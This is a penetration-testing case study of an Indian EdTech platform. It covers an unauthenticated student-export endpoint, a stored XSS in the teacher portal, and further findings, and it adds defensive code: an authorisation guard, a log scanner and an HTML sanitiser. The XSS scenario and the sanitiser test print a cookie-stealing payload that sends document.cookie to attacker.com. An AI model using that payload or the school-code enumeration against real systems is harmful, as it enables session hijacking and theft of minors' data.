Case Study · Technology · India · January 20, 2026

Penetration Testing for an EdTech Platform Handling Student Data

An Indian EdTech platform serving 2 million+ students commissioned a penetration test ahead of partnerships with state education boards. CyberneticsPlus uncovered mass student data exposure via an unsecured API endpoint and a stored XSS in the teacher portal.

  • 2M+ Student Records Protected
  • 17 Findings Identified
  • 30 days Full Remediation Time

Web Application Penetration Testing · API Security Testing · Vulnerability Assessment

Background

A Hyderabad-based EdTech platform providing online learning, assessment, and progress tracking for K-12 students engaged CyberneticsPlus for a penetration test. The platform had 2.1 million registered student accounts across India, with student data including age, school name, class, performance records, and parent contact information.

The driver: three state education boards were in discussions to use the platform for official curriculum delivery and assessment — each requiring a security audit report before signing agreements. The platform had no prior formal security assessment.

Scope:

  • Student-facing web application and mobile API
  • Teacher and school administrator portal
  • Parent notification API
  • Content management system (internal, used by curriculum team)

Key Findings

Critical: Mass Student Data Exposure via Unauthenticated API

Finding: During API endpoint enumeration, CyberneticsPlus discovered an undocumented endpoint: /api/v1/students/export?school_code={school_code}

The endpoint, originally built for a school bulk-import feature, was never removed after the feature was redesigned. It accepted a school code (4-digit numeric identifier) and returned a paginated export of all student records for that school — with no authentication required.

School codes were sequential and easily enumerable (tested codes 1001 through 1050, all returning valid school data).

Data exposed per request:

  • Student name, age, class, section
  • Parent/guardian name and mobile number
  • School name and city
  • Assessment scores and performance percentiles

Scope of exposure: Testing confirmed all 2.1 million student records were accessible via this endpoint by iterating school codes. The endpoint had been live for 14 months.

Immediate action: CyberneticsPlus notified the client’s CTO verbally within 2 hours of discovery. The endpoint was disabled within 4 hours. No evidence of prior exploitation was found in server access logs (log retention was 30 days — access in earlier months could not be ruled out).

Fix: Endpoint permanently removed. API audit conducted to identify other unauthenticated routes — 2 additional low-risk unauthenticated endpoints identified and secured.

Regulatory consideration: The client’s legal team assessed notification obligations under India’s Digital Personal Data Protection Act, 2023 (DPDPA). Decision: given the absence of confirmed exploitation evidence and the sensitivity of the data (no financial data, no government IDs), and given that the endpoint was disabled before any confirmed misuse, the client elected to document the incident internally and implement enhanced monitoring rather than formal notification. Legal counsel’s advice was that this met the DPDPA’s risk-proportionate approach.
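Two things a defender wants to see for this finding are what the missing authorisation check should have looked like and how the 30-day access logs can be screened for the sequential school_code walk the engagement describes. The Node.js block below is an added example, not CyberneticsPlus's or the client's code; the route guard, the session shape ({ userId, role, schoolCode }), the Apache-style log format and the sample log lines are all assumptions constructed for illustration.

```javascript
// Added example (not the client's or CyberneticsPlus's code). Route, session
// shape and log format are assumptions for illustration only.

// Hypothetical session object: { userId, role, schoolCode }, or null when the
// request carries no valid session. Every export request must pass this guard.
function authorizeStudentExport(session, query) {
  if (!session) {
    return { allowed: false, status: 401, reason: 'authentication required' };
  }
  // Only school administrators may export, and only for their own school.
  if (session.role !== 'school_admin') {
    return { allowed: false, status: 403, reason: 'role not permitted to export' };
  }
  const code = String(query.school_code || '');
  if (!/^\d{4}$/.test(code)) {
    return { allowed: false, status: 400, reason: 'malformed school_code' };
  }
  // Scope by the caller's tenant from the session, never by the query alone.
  if (code !== session.schoolCode) {
    return { allowed: false, status: 403, reason: 'school_code outside caller scope' };
  }
  return { allowed: true, status: 200, reason: 'ok' };
}

// Detection over access logs: flag clients that successfully pulled many distinct
// school codes from the export route inside the log window, and note whether the
// codes form an unbroken sequence (the signature of a scripted walk).
const EXPORT_LINE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "GET \/api\/v1\/students\/export\?school_code=(\d+)[^"]*" (\d{3})/;

function findEnumerationBursts(logLines, minDistinctCodes = 10) {
  const perClient = new Map();
  for (const line of logLines) {
    const m = EXPORT_LINE.exec(line);
    if (!m) continue;
    const [, ip, , code, status] = m;
    if (status !== '200') continue; // only successful exports actually leaked data
    if (!perClient.has(ip)) perClient.set(ip, new Set());
    perClient.get(ip).add(code);
  }
  const hits = [];
  for (const [ip, codes] of perClient) {
    if (codes.size < minDistinctCodes) continue;
    const sorted = [...codes].map(Number).sort((a, b) => a - b);
    const sequential = sorted.every((c, i) => i === 0 || c === sorted[i - 1] + 1);
    hits.push({ ip, distinctCodes: codes.size, sequential });
  }
  return hits;
}

// Constructed sample log (not real traffic): one client walks codes 1001..1012,
// another fetches a single school once.
const SAMPLE_LOG = [];
for (let c = 1001; c <= 1012; c++) {
  const sec = String(c - 1001).padStart(2, '0');
  SAMPLE_LOG.push(
    `203.0.113.7 - - [10/Jan/2026:10:00:${sec} +0530] "GET /api/v1/students/export?school_code=${c}&page=1 HTTP/1.1" 200 48213`
  );
}
SAMPLE_LOG.push(
  '198.51.100.4 - - [10/Jan/2026:10:05:00 +0530] "GET /api/v1/students/export?school_code=1042 HTTP/1.1" 200 51004'
);

console.log(authorizeStudentExport(null, { school_code: '1001' }));
console.log(findEnumerationBursts(SAMPLE_LOG));
```

The guard fails closed at each step (no session, wrong role, malformed code, code outside the caller's own school), so removing the endpoint is not the only option: a bulk-import feature that genuinely needs an export can keep it behind this check. The log scan is deliberately simple; in practice it would run as a scheduled query over the retained logs so the 30-day window is actually watched rather than consulted only after a pentest.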

Critical: Stored XSS in Teacher Portal — Session Hijacking Path

Finding: The teacher portal’s assignment description field accepted rich-text HTML content, which was rendered in the school administrator’s review dashboard without sanitisation. A teacher user could inject JavaScript that executed in an administrator’s browser session.

Exploitation scenario:

  1. Teacher submits assignment with payload: <img src=x onerror="document.location='https://attacker.com/steal?c='+document.cookie">
  2. School administrator reviews pending assignments → payload executes in their browser
  3. Administrator session cookie stolen → attacker gains administrator access
  4. Administrator can access all student records, teacher accounts, and school configuration for their school

Fix: Rich-text editor configured to strip script tags and event handlers (DOMPurify allowlist applied). Content Security Policy added to the administrator portal: Content-Security-Policy: default-src 'self'; script-src 'self'
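To make the fix concrete, the block below is an added allowlist sanitiser for the assignment description field; it is not the client's code and not DOMPurify, which is what the engagement actually deployed. It shows the principle DOMPurify's allowlist applies: every tag not on the list is removed, every attribute not on the list (so every on* handler) is dropped, and URL-bearing attributes only survive with an http(s) or colon-free relative value. The tag and attribute lists are assumptions chosen for a rich-text editor.

```javascript
// Added example (not the client's code, not DOMPurify): an allowlist sanitiser
// for rich-text HTML. Tag/attribute allowlists are assumptions for illustration.
const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt']) };
const URL_ATTRS = new Set(['href', 'src']);

const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
const ATTR_RE = /([a-zA-Z][\w:-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Text nodes: neutralise anything that could open a tag. Existing entities are kept.
function escapeText(text) {
  return text.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Only absolute http(s) URLs or colon-free relative paths survive; javascript:,
// data:, vbscript: and friends all carry a scheme and are rejected.
function safeUrl(value) {
  const v = value.trim();
  if (/^https?:\/\//i.test(v)) return v;
  if (/^[^:]*$/.test(v) && v.length > 0) return v;
  return null;
}

function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  let out = '';
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    if (!allowed.has(name)) continue; // drops onerror, onclick, style, srcdoc, ...
    let value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4] !== undefined ? m[4] : '';
    if (URL_ATTRS.has(name)) {
      value = safeUrl(value);
      if (value === null) continue;
    }
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

function sanitizeRichText(html) {
  let out = '';
  let last = 0;
  for (const m of html.matchAll(TAG_RE)) {
    out += escapeText(html.slice(last, m.index));
    last = m.index + m[0].length;
    const tag = m[1].toLowerCase();
    // Unknown tags (script, iframe, object, ...) are removed; any text they wrapped
    // is emitted as escaped text, which the browser will not execute.
    if (!ALLOWED_TAGS.has(tag)) continue;
    if (m[0].startsWith('</')) {
      out += `</${tag}>`;
    } else {
      out += `<${tag}${sanitizeAttrs(tag, m[2])}>`;
    }
  }
  out += escapeText(html.slice(last));
  return out;
}

// The payload from the finding, run through the sanitiser.
const FINDING_PAYLOAD =
  '<img src=x onerror="document.location=\'https://attacker.com/steal?c=\'+document.cookie">';
console.log(sanitizeRichText(FINDING_PAYLOAD)); // <img src="x">
```

With this in place the payload from the exploitation scenario renders as a plain broken image, and the Content-Security-Policy header from the fix (script-src 'self') remains as a second layer in case a sanitiser bypass is ever found. A regex tokeniser like this one is an approximation of a real HTML parser; quoted attribute values containing `>` or malformed markup make it fall back to escaped text, which is the safe direction, but that is exactly why a maintained library such as DOMPurify is the right production choice.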

High Findings (5)

  • Parent portal: IDOR on child account data (parent A could view child records of parent B by modifying student_id parameter)
  • Teacher portal: No rate limiting on student search endpoint (could be used to enumerate and download student records)
  • Content management: Admin panel accessible without IP restriction or MFA
  • Mobile API: JWT tokens not invalidated on logout (30-day tokens remained valid after logout)
  • Infrastructure: 3 EC2 instances with port 22 open to 0.0.0.0/0

Medium Findings (9)

  • Missing security headers (CSP, X-Frame-Options, HSTS) on student-facing application
  • Verbose error messages exposing database table names
  • Student profile photos stored in a public S3 bucket (no sensitive data, but photos of minors publicly accessible)
  • Password reset tokens valid for 24 hours (should be 1 hour)
  • Missing input validation on assignment submission (could upload malicious file types)
  • API documentation accessible without authentication (exposed internal endpoint structure)
  • No WAF on student-facing application
  • Outdated dependencies (3 npm packages with known CVEs)
  • No monitoring or alerting on suspicious access patterns

Remediation and Outcome

  • Critical findings: Both resolved within 72 hours of report delivery (endpoint removed, XSS patched)
  • High findings: All 5 resolved within 10 business days
  • Medium findings: 7 of 9 resolved within 30 days; 2 deferred (API docs access, dependency updates — both on roadmap with defined timelines)

CyberneticsPlus provided the client with a remediation certificate and a clean retest report covering all critical and high findings.

State education board partnerships:

  • Two of three boards reviewed the penetration test report and retest evidence — both proceeded with partnership agreements
  • Third board requested an additional security questionnaire response from CyberneticsPlus — completed within 3 business days — and subsequently signed the agreement

The EdTech platform now conducts semi-annual penetration tests and has implemented a vulnerability disclosure programme (VDP) for responsible reporting of future security issues.

Anonymous
